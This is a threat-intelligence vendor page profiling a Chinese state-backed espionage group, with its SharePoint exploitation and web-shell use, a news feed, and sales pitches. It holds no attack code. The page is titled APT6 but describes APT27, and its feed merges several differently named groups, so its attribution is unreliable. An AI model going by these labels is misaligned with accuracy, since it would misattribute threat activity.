Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to threat actors

APT6

APT27, also known as Emissary Panda, is a China-nexus advanced persistent threat group. The group has been specifically identified as leveraging critical vulnerabilities such as CVE-2019-0604 in Microsoft SharePoint to gain persistent access to government organizations in the Middle East, using tools like the China Chopper web shell. APT27's targeting includes government, academic, utility, heavy industry, manufacturing, and technology sectors. Their operations are consistent with broader Chinese cyber-espionage objectives, including intellectual property theft and surveillance. APT27 is considered a state-backed actor, operating in alignment with Chinese strategic interests. Known aliases include Emissary Panda. Their tactics include exploiting zero-day vulnerabilities, deploying web shells for persistence, and targeting high-value organizations for espionage. There is no high-confidence evidence in the provided content of APT27's involvement in ransomware or financially motivated attacks.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

5 SOURCESView more in app
the record mediaNews
Oct 22, 2025
ToolShell bug used by Chinese attackers against governments in Africa, South America

Linen Typhoon is a Chinese state-backed threat actor known for conducting espionage attacks and intellectual property theft, recently observed exploiting the ToolShell (CVE-2025-53770) vulnerability in Microsoft SharePoint to compromise government, telecom, and academic organizations worldwide.

Read more
risky biz rssNews
Sep 22, 2025
Risky Bulletin: Cyberattack disrupts airports across Europe

APT27 is a Chinese cyber-espionage group known for targeting organizations for intelligence gathering.

Read more
sekoia blogNews
Sep 7, 2023
My Tea’s not cold. An overview of China’s cyber threat

Lucky Mouse is a China-nexus threat actor known for targeting government and technology sectors, developing cross-platform malware, and leveraging spearphishing and supply chain attacks.

Read more
securelistNews
Aug 1, 2019
APT trends report Q2 2019

LuckyMouse is a Chinese-speaking APT group targeting government organizations in the Middle East, exploiting SharePoint vulnerabilities and using web shells for further compromise.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.